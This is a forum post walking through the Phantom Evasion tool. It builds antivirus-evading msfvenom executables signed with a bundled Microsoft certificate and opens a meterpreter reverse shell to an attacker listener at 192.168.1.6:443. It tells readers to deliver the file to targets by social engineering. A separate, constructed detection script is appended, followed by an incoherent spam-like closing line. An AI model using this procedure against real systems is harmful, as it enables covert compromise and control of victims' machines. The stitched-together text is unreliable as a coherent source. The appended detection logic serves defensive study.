AdminSec

BYPASS ANTIVIRUS DETECTION WITH PHANTOM PAYLOADS


Metasploit is the most popular tool used in pentesting. Metasploit tries to find weaknesses across your local network before an attacker does. This is the most common tool used by attackers to test the security of an operating system. In Kali Linux, Metasploit comes pre-installed with lots of payloads, which are used to generate malicious executables to hack different platforms. But today we will show you a tool called Phantom Evasion, which is used to generate FUD (Fully Undetectable) executables with an msfvenom payload. According to the developer, Phantom Evasion's main aim is to bypass antivirus detection, or we can say Antivirus Evasion.

Phantom Evasion has been tested on Kali Linux 2018.4 (amd64).
For cloning type git clone

Hidden Content

    Give reaction or reply to this topic to see the hidden content.

Type cd Phantom-Evasion
Type chmod u+x phantom-evasion.py
Type python3 phantom-evasion.py
When running for the first time, it may encounter some errors, but the tool will work perfectly.


Type 1

Type 2

After selecting any payload, it will display a description of the payload and on what extension the payload will be built.

Type 192.168.1.6 (Listen/Attacker's IP address)

Type 443 (Listen/Attacker's Port)

Then enter filename: file

Type n to create only a single process on the target computer, so there is less chance of getting caught by the antivirus.

Type Y

The above query will minimize the malicious file size.
Type y

The above query will sign the malicious file with the default certificate that comes with Phantom Evasion.
You can use your own certificate or use it with the Microsoft certificate which comes with Phantom Evasion.
Type y
Type 1

Type 1

After creating the malicious code, send the file to the target. You can use any social engineering to trick your target.

TESTING WINDOWS PLATFORM :-

For testing, we are using Windows 7 (32 Bit) with Windows Defender disabled.
Open the executable file by pressing Enter.
For checking the payload, you can use the Metasploit multi handler, which comes pre-installed in Kali Linux. Open another terminal and type msfconsole.
Type use multi/handler

Type LHOST 192.168.1.6 (same as you entered in Phantom Evasion).
Type LPORT 443 (same as you entered in Phantom Evasion).
Type show options

Type run

As the malicious file is already started on Windows 7 Professional 32 Bit, after typing run a new session will be created between the attacker and target machines.
Type sysinfo to check the target computer details.

Now you can manipulate the target using the meterpreter command shell.
Now, for further testing, we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled.
Open the malicious exe on the Windows 10 machine. As you open the exe, a new session will be created in multi/handler.
Type sysinfo to check the target computer details.

Now you can manipulate the target using the meterpreter command shell.

        • Like 1
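
A defender-side view of the walkthrough above, as an added example that is not part of the original post or of Phantom Evasion: it joins signature validation results with outbound connections, so a binary that carries a Microsoft signer name but does not validate is flagged when it calls out. The events, paths and field names (modelled on Sysmon image-load and network-connection events) are constructed assumptions, as is the premise that the certificate bundled with the tool fails validation on the endpoint; 192.168.1.6:443 is the listener address used in the post.

```python
# Constructed telemetry for illustration, not data from the original post. Field
# names are modelled on Sysmon image-load and network-connection events and are
# an assumption about your own log schema.
SIGNATURE_EVENTS = [
    {"ImageLoaded": r"C:\Windows\System32\svchost.exe", "Signed": "true",
     "Signature": "Microsoft Windows Publisher", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Users\lab\Downloads\file.exe", "Signed": "true",
     "Signature": "Microsoft Corporation", "SignatureStatus": "Untrusted"},
    {"ImageLoaded": r"C:\Tools\updater.exe", "Signed": "false",
     "Signature": "", "SignatureStatus": "Unavailable"},
]
NETWORK_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"Image": r"C:\Users\lab\Downloads\file.exe", "Initiated": "true",
     "DestinationIp": "192.168.1.6", "DestinationPort": 443},
    {"Image": r"C:\Users\lab\Downloads\file.exe", "Initiated": "false",
     "DestinationIp": "192.168.1.20", "DestinationPort": 49712},
    {"Image": r"C:\Tools\updater.exe", "Initiated": "true",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

def signer_is_trusted(sig):
    """True only when the signature verified; the signer name alone proves nothing."""
    return sig is not None and sig["Signed"] == "true" and sig["SignatureStatus"] == "Valid"

def find_suspect_connections(signature_events, network_events):
    """Return outbound connections made by images whose signature did not validate."""
    sig_by_image = {e["ImageLoaded"].lower(): e for e in signature_events}
    findings = []
    for conn in network_events:
        if conn["Initiated"] != "true":
            continue  # keep only connections the process itself started
        sig = sig_by_image.get(conn["Image"].lower())
        if signer_is_trusted(sig):
            continue
        claimed = sig["Signature"] if sig else ""
        # A Microsoft name on a signature that fails validation is a stronger
        # signal than a plainly unsigned binary, so it is ranked higher.
        severity = "high" if "microsoft" in claimed.lower() else "medium"
        findings.append({"image": conn["Image"], "severity": severity,
                         "claimed_signer": claimed,
                         "destination": f'{conn["DestinationIp"]}:{conn["DestinationPort"]}'})
    return findings

FINDINGS = find_suspect_connections(SIGNATURE_EVENTS, NETWORK_EVENTS)
for finding in FINDINGS:
    print(finding)
```

The check keys on validation status rather than on antivirus verdicts, which matters because the post reports the payload running on Windows 10 with Windows Defender enabled.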


        I can use the latest technology to make the perfect kill-free effect.?
